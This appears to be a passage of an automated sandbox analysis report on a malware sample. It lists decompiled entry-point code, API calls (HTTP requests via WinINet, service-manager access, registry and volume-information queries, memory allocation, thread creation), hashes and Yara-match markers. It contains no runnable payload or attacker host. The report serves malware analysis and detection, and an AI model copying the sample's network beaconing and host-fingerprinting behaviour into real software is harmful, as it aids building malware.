#5301.MFC42(?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074F7
#6215.MFC42(00000005,?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 00407505
UpdateWindow.USER32(?), ref: 00407510
#617.MFC42(?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 00407528

Strings

iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy, xrefs: 0040740C
Options, xrefs: 0040746F
ShowSplash, xrefs: 0040746A
DCUtility, xrefs: 00407455

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#1199#1247#2621#296#3521#520#5214#5301#6117#617#6215#823#986H_prologUpdateWindow
String ID: DCUtility$Options$ShowSplash$iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy
API String ID: 1685856080-1917206949
Opcode ID: 8bb1e21e92df81d25fe93d16706db79f1f48b4f0d101c09cac2587dd31da2476
Instruction ID: 87cd1a690a1306aa21be3c6f62f085d0f3d7fa174c0a594ac2e40056944deea9
Opcode Fuzzy Hash: 8bb1e21e92df81d25fe93d16706db79f1f48b4f0d101c09cac2587dd31da2476
Instruction Fuzzy Hash: CC31F831B44224AADB04FBB2AC46BEEBA64AF04718FA1417FB505B71C2DE785A04835D

Uniqueness

Uniqueness Score: -1.00%

Function 00426A4E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x42f6e0);
				_push(0x426c04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x442358 =  *0x442358 | 0xffffffff;
				 *0x442368 =  *0x442368 | 0xffffffff;
				 *(__p__fmode()) =  *0x442344;
				 *(__p__commode()) =  *0x442340;
				 *0x44234c = _adjust_fdiv;
				_t27 = E00426BF1( *_adjust_fdiv);
				_t61 =  *0x441f28; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00426BEE);
				}
				E00426BD6(_t27);
				_push(0x43453c);
				_push(0x434438);
				L00426BD0();
				_v112 =  *0x44233c;
				_t6 =  &_v116; // 0x43453c
				__getmainargs( &_v100, _t6,  &_v104,  *0x442338,  &_v112);
				_push(0x434334);
				_push(0x434000); // executed
				L00426BD0(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00427012(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00426BBE();
				return _t41;
			}

APIs

__set_app_type.MSVCRT ref: 00426A7B
__p__fmode.MSVCRT ref: 00426A90
__p__commode.MSVCRT ref: 00426A9E
__setusermatherr.MSVCRT ref: 00426ACA
_initterm.MSVCRT ref: 00426AE0
__getmainargs.MSVCRT ref: 00426B03
_initterm.MSVCRT ref: 00426B13
GetStartupInfoA.KERNEL32(?), ref: 00426B52
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00426B76
exit.MSVCRT ref: 00426B86
_XcptFilter.MSVCRT ref: 00426B98

Strings

<EC, xrefs: 00426AFB, 00426AFE

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: <EC
API String ID: 801014965-2968219276
Opcode ID: 9000273e03068eb3a86a77660bf31848d414010d4a29d6d2c8371e401a983082
Instruction ID: 973226223ed4a4ace8080d8c70552b9c9e4ae68073858dfa0026cc4f04fd176e
Opcode Fuzzy Hash: 9000273e03068eb3a86a77660bf31848d414010d4a29d6d2c8371e401a983082
Instruction Fuzzy Hash: 0A418675E403649FD7209FA4E845BAABFB8FB0A710F61012FF941D72A1C7B85841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00782103, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 232networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(00781323,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,00781323), ref: 00782205
InternetCloseHandle.WININET(?,?,?,?,00781323), ref: 00782236

Part of subcall function 00782EB4: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00782EE7

ObtainUserAgentString.URLMON(00000000,00000000,?,?,?,?,00781323), ref: 0078229B
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00781323), ref: 0078234A
HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000,?,?,?,?,?,?,00781323), ref: 0078239D

Strings

c7', xrefs: 00782309
c7', xrefs: 00782209
c7', xrefs: 007822C9

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: Internet$AgentAllocateCloseConnectHandleHeapHttpObtainOpenRequestSendStringUser
String ID: c7'$c7'$c7'
API String ID: 269441466-701251198
Opcode ID: 3270c5ff498df5480d911956739017c7ef0d3a7e03e0750a314712d01f7f525f
Instruction ID: 4b4d1ed9b47b35193e5c4a40de2b96436ae10135093641ccb086d09f22556025
Opcode Fuzzy Hash: 3270c5ff498df5480d911956739017c7ef0d3a7e03e0750a314712d01f7f525f
Instruction Fuzzy Hash: 04614A71F84214EBDF18BAA88C59A7F76AAEF84311F614119FC25F7386DA38CD025391

Uniqueness

Uniqueness Score: -1.00%

Function 0078676F, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,1F000E3F,?), ref: 00786876

Strings

vaJP, xrefs: 0078686B
.-|*, xrefs: 00786866
vaJP, xrefs: 007867EC

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: ManagerOpen
String ID: .-|*$vaJP$vaJP
API String ID: 1889721586-19128010
Opcode ID: e0df900e6fe28576ce61a82cfad020ef6724f0194616411e630722f77ad3e9c7
Instruction ID: 44dfd2e67fa5bd7d9c81b1d52bb7c80a6a55a3efc17c89122f52df0b7220c470
Opcode Fuzzy Hash: e0df900e6fe28576ce61a82cfad020ef6724f0194616411e630722f77ad3e9c7
Instruction Fuzzy Hash: 4C4106707C0304BBE62876589C8AFA922D4DB54B14F70442BF615EF3D2C97CDD8287AA

Uniqueness

Uniqueness Score: -1.00%

Function 007869F4, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143registryCOMMON

Download Yara Rule

APIs

RegGetValueW.KERNELBASE(-80000001,?,?,00000008,00000000,00000000,1F000E3F,?,00000000,?), ref: 00786A76

Part of subcall function 00786C88: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00786D06

Part of subcall function 00782E59: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00782E8C

Strings

vaJP, xrefs: 00786A60
vaJP, xrefs: 00786AE0

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: FreeHeapInformationValueVolume
String ID: vaJP$vaJP
API String ID: 2856442806-3354988028
Opcode ID: ecd2c2a906675755a384f86118737327e9350adcf3035dbaa1008ca0aba46052
Instruction ID: 87558514c6897cbb0b30d2f99bfb885860f42c4a916367c732cd31d2bf6d2648
Opcode Fuzzy Hash: ecd2c2a906675755a384f86118737327e9350adcf3035dbaa1008ca0aba46052
Instruction Fuzzy Hash: 26411C71EC0218F7DB24B6644D49BFEA66CDB80310F2580A6ED19FB281ED3D4E458792

Uniqueness

Uniqueness Score: -1.00%

Function 00785A04, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000,?,1F000E3F,?), ref: 00785B27

Strings

[Jt., xrefs: 00785B30
[Jt., xrefs: 00785A4A

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: [Jt.$[Jt.
API String ID: 823142352-1226259730
Opcode ID: 3200ac7186abf52d25e5a8f2c756a669bc3962778302af95ed0542273867f344
Instruction ID: 4de177cdd46c4eda848a61bd94d7336ab8a633a0a57fafb5b2ae37e66c75fc28
Opcode Fuzzy Hash: 3200ac7186abf52d25e5a8f2c756a669bc3962778302af95ed0542273867f344
Instruction Fuzzy Hash: 4B31CA72FC0324A7DB34B4AC4CC5FAD9A598B94710F148261F8A5FB2D5C9780D4A03E7

Uniqueness

Uniqueness Score: -1.00%

Function 0077002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,00770005), ref: 007700EB
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00770005), ref: 00770113

Memory Dump Source

Source File: 0000000A.00000002.511863811.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction ID: 1910b90907bb61cda1ff98c88e44c5cc344fbd42dabad04171bda7b8de3576a4
Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction Fuzzy Hash: 0FE1BC71A04346CFDF24CF29C88472AB7E0BF95398F18852DE8999B241E778E855CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00786DD0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 00786E44

Strings

pE, xrefs: 00786F5E

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: pE
API String ID: 1065410024-638595391
Opcode ID: 7de43bb580351b24628641fb6bed91e0f8441461bac688359c8202af6c3ceffd
Instruction ID: c1db9c4c208c95b14083e4c1c3e5d80043ef106f28b2c68a37e6d4da16dd57bc
Opcode Fuzzy Hash: 7de43bb580351b24628641fb6bed91e0f8441461bac688359c8202af6c3ceffd
Instruction Fuzzy Hash: 0C3168357C0208BBDA38BA686C85F7D229AAB80310F20842AF611DF3C5CE7DCD425366

Uniqueness

Uniqueness Score: -1.00%

Function 00786F78, Relevance: 3.1, APIs: 2, Instructions: 76stringCOMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 00786FED
lstrcmpiW.KERNELBASE(?,?,ED141F18,?,07D18E9C), ref: 0078704F

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: FullImageNameProcessQuerylstrcmpi
String ID:
API String ID: 2545454535-0
Opcode ID: 7ba75d8bd11e3406148aabbdef51cd471772ca0ad446009b27ef691250430a20
Instruction ID: 8956ae1117547adc1de2c3b2d225e1b2d8f098123c907ffcdfbb5ba0c6641543
Opcode Fuzzy Hash: 7ba75d8bd11e3406148aabbdef51cd471772ca0ad446009b27ef691250430a20
Instruction Fuzzy Hash: FD1138B1B84208A7D620B5695C48DFFB29ECBC4350F704576E619DB286DC38CD8583A2

Uniqueness

Uniqueness Score: -1.00%

Function 00426960, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 0042696D
__dllonexit.MSVCRT ref: 00426983

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: e13c0cc0f9de888981191626d4e8f63219d8df6060ff97497c221d9c5f2f65b6
Instruction ID: c57bb4b2666bd6d952ed105ed5c036a131e1d4e74f988f008a14468e8bd43da9
Opcode Fuzzy Hash: e13c0cc0f9de888981191626d4e8f63219d8df6060ff97497c221d9c5f2f65b6
Instruction Fuzzy Hash: 34C01275540710FADE111F30BD0A5453731B795B33BF5466AF875100F09BBD0999E509

Uniqueness

Uniqueness Score: -1.00%

Function 00784F10, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,1CE91713,19334097,00784FFB,?,1F000E3F,?,007848E5), ref: 00784EFB

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 79b73f4bba9b03fc7b91c8121ab46e64472ae0b2692571c682766c1afc78c974
Instruction ID: 4393409a973153a279ae651ae065bde1bdb23b085876465d6353b180aa3aeab4
Opcode Fuzzy Hash: 79b73f4bba9b03fc7b91c8121ab46e64472ae0b2692571c682766c1afc78c974
Instruction Fuzzy Hash: 7921D0217C462297DA34B96D18A973C4286DBC5765B7C803FF306DB2A1C8DCCD8343A2

Uniqueness

Uniqueness Score: -1.00%

Function 007839C7, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00783AA0

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: a5f2dbcb339b6a491a4068b34e432ab30833da67439d24d5e7d0fabcdcefd7f8
Instruction ID: 2779a79c3aa8e25dd2164ccb719840e42742a6b78dfabae65c0eafccd80d9afe
Opcode Fuzzy Hash: a5f2dbcb339b6a491a4068b34e432ab30833da67439d24d5e7d0fabcdcefd7f8
Instruction Fuzzy Hash: BC115931B8411447DB38B55C8CC22BDEAD99784B54F244657F988E6241D9AECF454393

Uniqueness

Uniqueness Score: -1.00%

Function 0078705F, Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00005DD0,00000000,00000000,00000000,?,1F000E3F,?,00784E7F), ref: 007870AA

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2be6d2196d741d90b3215b2169349278949dbfc1f20c5317b164cc07b6bfe753
Instruction ID: 4ba07f94397971d498c45b3a25a2f518c455915cedbe6e69e9c0a00273a1afa0
Opcode Fuzzy Hash: 2be6d2196d741d90b3215b2169349278949dbfc1f20c5317b164cc07b6bfe753
Instruction Fuzzy Hash: B901C4743C6111A79638A6695C9C9771E85CFC53A1730C02AA50ACA280DA79CC42C7BA

Uniqueness

Uniqueness Score: -1.00%

Function 00783AC3, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00783B41

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 8863aee4146aa0495b7c6767aa55101508c2806782fbc87cbddad63a04a98c9e
Instruction ID: 1c203519a7310aa643fac24c729cc462a1ef6c447fc03296b446ec718c91e528
Opcode Fuzzy Hash: 8863aee4146aa0495b7c6767aa55101508c2806782fbc87cbddad63a04a98c9e
Instruction Fuzzy Hash: BD01D4E1A82218A6DB30F7588C49EEBBFBCDF41750F508196A818D7181DB74CF8487E1

Uniqueness

Uniqueness Score: -1.00%

Function 00786C88, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00786D06

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 8863aee4146aa0495b7c6767aa55101508c2806782fbc87cbddad63a04a98c9e
Instruction ID: edc5f7b821a759d7918f6e219905eb92dad2fc1e284bccb3b64a6df9ac2dca7b
Opcode Fuzzy Hash: 8863aee4146aa0495b7c6767aa55101508c2806782fbc87cbddad63a04a98c9e
Instruction Fuzzy Hash: 6D01F761A81228B6DB30B754CC09EE77BBCDF41350F508196A858D71C1DA74DE44C7F2

Uniqueness

Uniqueness Score: -1.00%

Function 00783169, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104), ref: 007831BD

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 54301008a6dd8091ca8665db0b1b53a2b89db2655bb2e3e04d6116b332dff346
Instruction ID: 69b40ac32c4d70f3aafdecd72fbe155259af7e1fd182199deba33344aa26be9d
Opcode Fuzzy Hash: 54301008a6dd8091ca8665db0b1b53a2b89db2655bb2e3e04d6116b332dff346
Instruction Fuzzy Hash: 84F02B727C421877E624A5AD1C45E6B9A9DCFC6BA1FA0801AB504E72C6DDF5CD0502B1

Uniqueness

Uniqueness Score: -1.00%

Function 00782E59, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00782E8C

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8134c35704506db3f6224d3ee743b0a736f7a55282f282e073004cc510d91bcd
Instruction ID: eefee28016531f4d41a5d52f56c11c6fe56afe845bdfdfab158d359b37d9876c
Opcode Fuzzy Hash: 8134c35704506db3f6224d3ee743b0a736f7a55282f282e073004cc510d91bcd
Instruction Fuzzy Hash: 91D0C7317C521467E51531A83C05FA6050E8FC5754F6180167564AE3CFCEB49E8302E6

Uniqueness

Uniqueness Score: -1.00%

Function 00782EB4, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00782EE7

Memory Dump Source

Source File: 0000000A.00000002.511924593.0000000000781000.00000020.00000001.sdmp, Offset: 00781000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee2e3e15626e61e0c9d00a952cbde3aa54d6b0980894171f10bb3f89d9df6659
Instruction ID: ee547482c174cc13de98038ee465bcaae6fcc4db08c06724531b080adb209acf
Opcode Fuzzy Hash: ee2e3e15626e61e0c9d00a952cbde3aa54d6b0980894171f10bb3f89d9df6659
Instruction Fuzzy Hash: 69D0A7317C811027E01431AC3C05E66040E8FC5750F90C01575549E2CECDF4CE4303E2

Uniqueness

Uniqueness Score: -1.00%

Function 004016FE, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004016FE(intOrPtr* __ecx) {

				_push(0); // executed
				L00425DEA(); // executed
				 *__ecx = 0x42c080;
				return __ecx;
			}

0x0040359e
0x004035a0
0x004035a5
0x004035ae

APIs

#561.MFC42(00000000), ref: 004035A0

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #561
String ID:
API String ID: 1772186104-0
Opcode ID: 3f680eb7a44bf1a0127226000c97b68b85a1a457aea2414cfa67a65a5dc8ddde
Instruction ID: b5d7ef74cbff0a35d18b7aac3fdb3fc70e1e8a4ab46ac34ee7cde420759f923f
Opcode Fuzzy Hash: 3f680eb7a44bf1a0127226000c97b68b85a1a457aea2414cfa67a65a5dc8ddde
Instruction Fuzzy Hash: 3AB0123131523166E2502E987C3EBD55588CB0571AF51C66FF184AB280D7F80D4283D9

Uniqueness

Uniqueness Score: -1.00%

Function 00427012, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00427012(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L00427070(); // executed
				return __eax;
			}

0x00427012
0x00427016
0x0042701a
0x0042701e
0x00427022
0x00427027

APIs

#1576.MFC42(00426B82,00426B82,00426B82,00426B82,00426B82,00000000,?,0000000A), ref: 00427022

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction ID: 6ab3d5fe08d8fb0b52e94dcbe366bb71d603b3846e6d72eaa3845b5e5619f62c
Opcode Fuzzy Hash: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction Fuzzy Hash: 46B00836118396ABCB02DF919C01D2ABAA2BB98304F484D5DB2A10106287668428AB56

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004012F3, Relevance: 27.1, APIs: 18, Instructions: 88
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004012F3(intOrPtr* __ecx) {
				void _t31;
				struct HWND__* _t37;
				void* _t59;
				intOrPtr* _t61;
				void _t64;
				void* _t65;

				L004269E6();
				_t61 = __ecx;
				_push(_t65 - 0x14);
				 *(_t65 - 0x10) = OpenFileMappingA(0xf001f, 0,  *( *((intOrPtr*)( *__ecx + 0x14))()));
				L00425DFC();
				if( *(_t65 - 0x10) == 0) {
					L9:
					_t31 = 0;
				} else {
					_t59 = MapViewOfFile( *(_t65 - 0x10), 6, 0, 0, 4);
					if(_t59 == 0) {
						CloseHandle( *(_t65 - 0x10));
						L004016DB(_t61);
						goto L9;
					} else {
						_push(1);
						_push(_t61 + 4);
						L004268BE();
						_t64 =  *_t59;
						 *(_t65 - 4) = 0;
						if(_t64 != 0) {
							L004260F6();
							_push(_t64);
							 *(_t65 - 4) = 1;
							L004268DC();
							_t37 = GetLastActivePopup( *(_t65 - 0x40));
							_push(_t37);
							L00426372();
							 *(_t65 - 0x14) = _t37;
							if(IsIconic( *(_t65 - 0x40)) != 0) {
								_push(9);
								L00425E14();
